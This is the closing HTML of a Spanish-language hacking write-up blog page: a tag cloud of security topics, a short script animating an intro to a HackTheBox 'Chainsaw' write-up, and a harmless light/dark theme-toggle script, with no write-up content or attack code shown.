class="set-1">Directory,</a> <a href="/tag/dockers%2C/" class="set-1">Dockers,</a> <a href="/tag/domain/" class="set-1">Domain</a> <a href="/tag/dominios%2C/" class="set-1">Dominios,</a> <a href="/tag/dovecot%2C/" class="set-1">Dovecot,</a> <a href="/tag/elastix%2C/" class="set-1">Elastix,</a> <a href="/tag/empezando%2C/" class="set-1">Empezando,</a> <a href="/tag/encrypt-decrypt%2C/" class="set-1">Encrypt-Decrypt,</a> <a href="/tag/enumeracion%2C/" class="set-1">Enumeracion,</a> <a href="/tag/enumeration%2C/" class="set-1">Enumeration,</a> <a href="/tag/ethereum%2C/" class="set-1">Ethereum,</a> <a href="/tag/evil-winrm%2C/" class="set-1">Evil-WinRm,</a> <a href="/tag/excel%2C/" class="set-1">Excel,</a> <a href="/tag/excell/" class="set-1">Excell</a> <a href="/tag/execel/" class="set-1">Execel</a> <a href="/tag/exploit%2C/" class="set-1">Exploit,</a> <a href="/tag/fail2ban%2C/" class="set-1">Fail2ban,</a> <a href="/tag/file/" class="set-1">File</a> <a href="/tag/file%2C/" class="set-1">File,</a> <a href="/tag/files%2C/" class="set-1">Files,</a> <a href="/tag/firefox%2C/" class="set-1">Firefox,</a> <a href="/tag/ftp%2C/" class="set-1">Ftp,</a> <a href="/tag/fueza/" class="set-1">Fueza</a> <a href="/tag/fuzzing/" class="set-1">Fuzzing</a> <a href="/tag/fuzzing%2C/" class="set-1">Fuzzing,</a> <a href="/tag/get-adobject%2C/" class="set-1">Get-ADObject,</a> <a href="/tag/getchanges-all%2C/" class="set-1">GetChanges-All,</a> <a href="/tag/gitlab%2C/" class="set-1">GitLab,</a> <a href="/tag/gitbucket%2C/" class="set-1">Gitbucket,</a> <a href="/tag/gratuitas./" class="set-1">Gratuitas.</a> <a href="/tag/group%2C/" class="set-1">Group,</a> <a href="/tag/groups%2C/" class="set-1">Groups,</a> <a href="/tag/guessing%2C/" class="set-1">Guessing,</a> <a href="/tag/gwolle%2C/" class="set-1">Gwolle,</a> <a href="/tag/htb%2C/" class="set-5">HTB,</a> <a href="/tag/hackthebox%2C/" class="set-1">HackTheBox,</a> <a href="/tag/hacking/" class="set-3">Hacking</a> <a href="/tag/hacking%2C/" class="set-2">Hacking,</a> <a href="/tag/heartbleed%2C/" class="set-1">HeartBleed,</a> <a href="/tag/hex%2C/" class="set-1">Hex,</a> <a href="/tag/hijacking%2C/" class="set-1">Hijacking,</a> <a href="/tag/hydra%2C/" class="set-1">Hydra,</a> <a href="/tag/iis%2C/" class="set-1">IIS,</a> <a href="/tag/iis-6.0%2C/" class="set-1">IIS-6.0,</a> <a href="/tag/ipfs%2C/" class="set-1">IPFS,</a> <a href="/tag/ipv6%2C/" class="set-1">IPV6,</a> <a href="/tag/irc%2C/" class="set-1">IRC,</a> <a href="/tag/id-rsa%2C/" class="set-1">Id-Rsa,</a> <a href="/tag/impackect-secretsdump%2C/" class="set-1">Impackect-SecretsDump,</a> <a href="/tag/import/" class="set-1">Import</a> <a href="/tag/inclusion%2C/" class="set-1">Inclusion,</a> <a href="/tag/injection%29%2C/" class="set-1">Injection),</a> <a href="/tag/injection%2C/" class="set-1">Injection,</a> <a href="/tag/jjs%2C/" class="set-1">JJS,</a> <a href="/tag/jndi%2C/" class="set-1">JNDI,</a> <a href="/tag/joomla%2C/" class="set-1">Joomla,</a> <a href="/tag/journalctl%2C/" class="set-1">Journalctl,</a> <a href="/tag/juicypotato%2C/" class="set-1">JuicyPotato,</a> <a href="/tag/kerberoasting/" class="set-1">Kerberoasting</a> <a href="/tag/kerbrute/" class="set-1">Kerbrute</a> <a href="/tag/kerbrute%2C/" class="set-1">Kerbrute,</a> <a href="/tag/kernel/" class="set-1">Kernel</a> <a href="/tag/knocking%2C/" class="set-1">Knocking,</a> <a href="/tag/kubernetes%2C/" class="set-1">Kubernetes,</a> <a href="/tag/ldap/" class="set-1">LDAP</a> <a href="/tag/ldap%2C/" class="set-1">LDAP,</a> <a href="/tag/lfi%2C/" class="set-1">LFI,</a> <a href="/tag/local/" class="set-1">Local</a> <a href="/tag/log4j%2C/" class="set-1">Log4j,</a> <a href="/tag/mail%2C/" class="set-1">Mail,</a> <a href="/tag/malicius/" class="set-1">Malicius</a> <a href="/tag/maquina/" class="set-1">Maquina</a> <a href="/tag/maquinas/" class="set-5">Maquinas</a> <a href="/tag/mattermost%2C/" class="set-1">Mattermost,</a> <a href="/tag/mimikatz.exe%2C/" class="set-1">Mimikatz.exe,</a> <a href="/tag/misconfigurations%2C/" class="set-1">Misconfigurations,</a> <a href="/tag/mongo-db%2C/" class="set-1">Mongo-db,</a> <a href="/tag/mongodb%2C/" class="set-1">MongoDB,</a> <a href="/tag/mr.robot%2C/" class="set-1">Mr.Robot,</a> <a href="/tag/mssqlclient%2C/" class="set-1">Mssqlclient,</a> <a href="/tag/multiples/" class="set-1">Multiples</a> <a href="/tag/myssql-server%2C/" class="set-1">Myssql-Server,</a> <a href="/tag/neo4j%2C/" class="set-1">Neo4j,</a> <a href="/tag/nibbleblog%2C/" class="set-1">NibbleBlog,</a> <a href="/tag/nishang%2C/" class="set-1">Nishang,</a> <a href="/tag/nosqli%2C/" class="set-1">NoSQLI,</a> <a href="/tag/node-red%2C/" class="set-1">Node-Red,</a> <a href="/tag/nostromo/" class="set-1">Nostromo</a> <a href="/tag/os/" class="set-1">OS</a> <a href="/tag/oscp/" class="set-3">OSCP</a> <a href="/tag/osticket%2C/" class="set-1">OSTicket,</a> <a href="/tag/offensive/" class="set-1">Offensive</a> <a href="/tag/olevba/" class="set-1">Olevba</a> <a href="/tag/php%2C/" class="set-1">PHP,</a> <a href="/tag/php./" class="set-1">PHP.</a> <a href="/tag/password/" class="set-1">Password</a> <a href="/tag/path/" class="set-1">Path</a> <a href="/tag/path%2C/" class="set-3">Path,</a> <a href="/tag/pivoting%2C/" class="set-1">Pivoting,</a> <a href="/tag/plugins%2C/" class="set-1">Plugins,</a> <a href="/tag/pods%2Fcontainer./" class="set-1">Pods/Container.</a> <a href="/tag/popd%2C/" class="set-1">PopD,</a> <a href="/tag/port/" class="set-1">Port</a> <a href="/tag/portknocking%2C/" class="set-1">PortKnocking,</a> <a href="/tag/portainer%2C/" class="set-1">Portainer,</a> <a href="/tag/portal%2C/" class="set-1">Portal,</a> <a href="/tag/post-explotacion./" class="set-1">Post-Explotacion.</a> <a href="/tag/powershell/" class="set-1">PowerShell</a> <a href="/tag/powerup%2C/" class="set-1">PowerUp,</a> <a href="/tag/powershell%2C/" class="set-1">Powershell,</a> <a href="/tag/privesc/" class="set-1">Privesc</a> <a href="/tag/privesc%2C/" class="set-1">Privesc,</a> <a href="/tag/proteccions%2C/" class="set-1">Proteccions,</a> <a href="/tag/protection%2C/" class="set-1">Protection,</a> <a href="/tag/python%2C/" class="set-1">Python,</a> <a href="/tag/python3%2C/" class="set-1">Python3,</a> <a href="/tag/rce%2C/" class="set-1">RCE,</a> <a href="/tag/rdp-file%2C/" class="set-1">RDP-file,</a> <a href="/tag/rpcclient%2C/" class="set-1">RPCCLIENT,</a> <a href="/tag/read%2C/" class="set-1">Read,</a> <a href="/tag/readgmsapassword%2C/" class="set-1">ReadGMSAPassword,</a> <a href="/tag/recycle/" class="set-1">Recycle</a> <a href="/tag/remote/" class="set-1">Remote</a> <a href="/tag/retiradas/" class="set-1">Retiradas</a> <a href="/tag/retiradas%2C/" class="set-5">Retiradas,</a> <a href="/tag/retiradas./" class="set-1">Retiradas.</a> <a href="/tag/revome/" class="set-1">Revome</a> <a href="/tag/smb%2C/" class="set-1">SMB,</a> <a href="/tag/snmp%2C/" class="set-1">SNMP,</a> <a href="/tag/sqli/" class="set-1">SQLI</a> <a href="/tag/sqli%2C/" class="set-1">SQLI,</a> <a href="/tag/sqlinjecction%2C/" class="set-1">SQLInjecction,</a> <a href="/tag/ss%2C/" class="set-1">SS,</a> <a href="/tag/ssh%2C/" class="set-1">SSH,</a> <a href="/tag/ssrf/" class="set-1">SSRF</a> <a href="/tag/ssrf%2C/" class="set-1">SSRF,</a> <a href="/tag/ssti%28server/" class="set-1">SSTI(Server</a> <a href="/tag/suid%2C/" class="set-1">SUID,</a> <a href="/tag/sam%2C/" class="set-1">Sam,</a> <a href="/tag/samba%2C/" class="set-1">Samba,</a> <a href="/tag/scheduler%2C/" class="set-1">Scheduler,</a> <a href="/tag/script%2C/" class="set-1">Script,</a> <a href="/tag/secretsdump.py%2C/" class="set-1">SecretsDump.py,</a> <a href="/tag/secretsdumps.py%2C/" class="set-1">Secretsdumps.py,</a> <a href="/tag/security%2C/" class="set-1">Security,</a> <a href="/tag/shares/" class="set-1">Shares</a> <a href="/tag/sharphound.ps1%2C/" class="set-1">SharpHound.ps1,</a> <a href="/tag/shellshock%2C/" class="set-1">ShellShock,</a> <a href="/tag/side/" class="set-1">Side</a> <a href="/tag/smart/" class="set-1">Smart</a> <a href="/tag/smb%2C/" class="set-1">Smb,</a> <a href="/tag/smbclient%2C/" class="set-1">SmbClient,</a> <a href="/tag/smbmap%2C/" class="set-1">SmbMap,</a> <a href="/tag/sqsh%2C/" class="set-1">Sqsh,</a> <a href="/tag/starting/" class="set-1">Starting</a> <a href="/tag/steganografia%2C/" class="set-1">Steganografia,</a> <a href="/tag/subdomains%2C/" class="set-1">Subdomains,</a> <a href="/tag/sudo/" class="set-1">Sudo</a> <a href="/tag/system%2C/" class="set-1">System,</a> <a href="/tag/thm%2C/" class="set-1">THM,</a> <a href="/tag/template/" class="set-1">Template</a> <a href="/tag/tmux-priv%2C/" class="set-1">Tmux-Priv,</a> <a href="/tag/tomcat/" class="set-1">Tomcat</a> <a href="/tag/tomcat%2C/" class="set-1">Tomcat,</a> <a href="/tag/transfer%2C/" class="set-1">Transfer,</a> <a href="/tag/transferencia/" class="set-1">Transferencia</a> <a href="/tag/tryhackme%2C/" class="set-1">TryHackMe,</a> <a href="/tag/ubuntu/" class="set-1">Ubuntu</a> <a href="/tag/unrealirc%2C/" class="set-1">UnRealIRC,</a> <a href="/tag/upload/" class="set-1">Upload</a> <a href="/tag/userenum%2C/" class="set-1">Userenum,</a> <a href="/tag/vnc/" class="set-1">VNC</a> <a href="/tag/web/" class="set-2">Web</a> <a href="/tag/web3%2C/" class="set-1">Web3,</a> <a href="/tag/webshell%2C/" class="set-1">Webshell,</a> <a href="/tag/wget/" class="set-1">Wget</a> <a href="/tag/winpeas%2C/" class="set-1">WinPeas,</a> <a href="/tag/windows/" class="set-1">Windows</a> <a href="/tag/windows%2C/" class="set-1">Windows,</a> <a href="/tag/wordpress%2C/" class="set-1">Wordpress,</a> <a href="/tag/wpscan%2C/" class="set-1">Wpscan,</a> <a href="/tag/writeup/" class="set-2">Writeup</a> <a href="/tag/writeup%2C/" class="set-3">Writeup,</a> <a href="/tag/x-forwarder-for%2C/" class="set-1">X-Forwarder-For,</a> <a href="/tag/xp_cmdshell%2C/" class="set-1">Xp_CmdShell,</a> <a href="/tag/xp_dirtree%2C/" class="set-1">Xp_dirtree,</a> <a href="/tag/ysoserial%2C/" class="set-1">Ysoserial,</a> <a href="/tag/zona%2C/" class="set-1">Zona,</a> <a href="/tag/zone/" class="set-1">Zone</a> <a href="/tag/app-js%2C/" class="set-1">app-js,</a> <a href="/tag/bashscript%2C/" class="set-1">bashscript,</a> <a href="/tag/chisel%2C/" class="set-1">chisel,</a> <a href="/tag/de/" class="set-1">de</a> <a href="/tag/dompdf%2C/" class="set-1">dompdf,</a> <a href="/tag/ecppt%2C/" class="set-1">eCPPT,</a> <a href="/tag/fcrackzip%2C/" class="set-1">fcrackzip,</a> <a href="/tag/html/" class="set-1">html</a> <a href="/tag/injecction/" class="set-1">injecction</a> <a href="/tag/msfvenom%2C/" class="set-1">msfvenom,</a> <a href="/tag/nmap%2C/" class="set-1">nmap,</a> <a href="/tag/pfsense%2C/" class="set-1">pfSense,</a> <a href="/tag/pfx2john%2C/" class="set-1">pfx2john,</a> <a href="/tag/phpliteadmin%2C/" class="set-1">phpLiteAdmin,</a> <a href="/tag/privesc/" class="set-1">privesc</a> <a href="/tag/privesc%2C/" class="set-1">privesc,</a> <a href="/tag/python%2C/" class="set-1">python,</a> <a href="/tag/redis-cli%2C/" class="set-1">redis-cli,</a> <a href="/tag/rsync%2C/" class="set-1">rsync,</a> <a href="/tag/smtpd%2C/" class="set-1">smtpd,</a> <a href="/tag/socat%2C/" class="set-1">socat,</a> <a href="/tag/squidproxy%2C/" class="set-1">squidproxy,</a> <a href="/tag/steghide%2C/" class="set-1">steghide,</a> <a href="/tag/tar%2C/" class="set-1">tar,</a> <a href="/tag/webdav%2C/" class="set-1">webdav,</a> <a href="/tag/welcome/" class="set-1">welcome</a> <a href="/tag/xss/" class="set-1">xss</a></div>
  




<script>
  let i = 0;
  const text = 'En esta ocasion empezaremos con el Writeup de la maquina de HackTheBox llamada CHAINSAW';
  const speed = parseInt('50');
  
  function typeWriter() {
    if (i < text.length) {
      document.getElementById('animated-post-description').innerHTML += text.charAt(i);
      i++;
      setTimeout(typeWriter, speed);
    }
  }

  document.getElementById('animated-post-description').style.display = 'initial';
  typeWriter();
</script>

      </div>
    </main><footer class="site-footer">
  <div class="wrapper">
    <div class="credits"><a href="https://github.com/bitbrain/jekyll-dash">dash</a> theme for Jekyll by <a href="https://github.com/bitbrain">bitbrain</a> made with <i class="fas fa-heart"></i><div class="toggleWrapper">
    <input type="checkbox" class="dn" id="theme-toggle" onclick="modeSwitcher()" checked />
    <label for="theme-toggle" class="toggle">
    <span class="toggle__handler">
      <span class="crater crater--1"></span>
      <span class="crater crater--2"></span>
      <span class="crater crater--3"></span>
    </span>
        <span class="star star--1"></span>
        <span class="star star--2"></span>
        <span class="star star--3"></span>
        <span class="star star--4"></span>
        <span class="star star--5"></span>
        <span class="star star--6"></span>
    </label>
</div>
<script type="text/javascript">
const theme = localStorage.getItem('theme');

if (theme === "light") {
    document.documentElement.setAttribute('data-theme', 'light');
} else {
    document.documentElement.setAttribute('data-theme', 'dark');
}
const userPrefers = getComputedStyle(document.documentElement).getPropertyValue('content');

function activateDarkTheme() {
    document.getElementById('theme-toggle').checked = true;
    document.documentElement.setAttribute('data-theme', 'dark');
    document.documentElement.classList.add('theme--dark');
    document.documentElement.classList.remove('theme--light');
	document.getElementById("theme-toggle").className = 'light';
	window.localStorage.setItem('theme', 'dark');
}

function activateLightTheme() {
    document.getElementById('theme-toggle').checked = false;
    document.documentElement.setAttribute('data-theme', 'light');
    document.documentElement.classList.add('theme--light');
    document.documentElement.classList.remove('theme--dark');
	document.getElementById("theme-toggle").className = 'dark';
	window.localStorage.setItem('theme', 'light');
}

if (theme === "dark") {
    activateDarkTheme();
} else if (theme === "light") {
    activateLightTheme();
} else if  (userPrefers === "light") {
    activateDarkTheme();
} else {
    activateDarkTheme();
}

function modeSwitcher() {
	let currentMode = document.documentElement.getAttribute('data-theme');
	if (currentMode === "dark") {
	    activateLightTheme();
	} else {
	    activateDarkTheme();
	}
}
</script></div>
  </div>
</footer>


<script>
      window.FontAwesomeConfig = {
        searchPseudoElements: true
      }
    </script>
  </body>

</html>
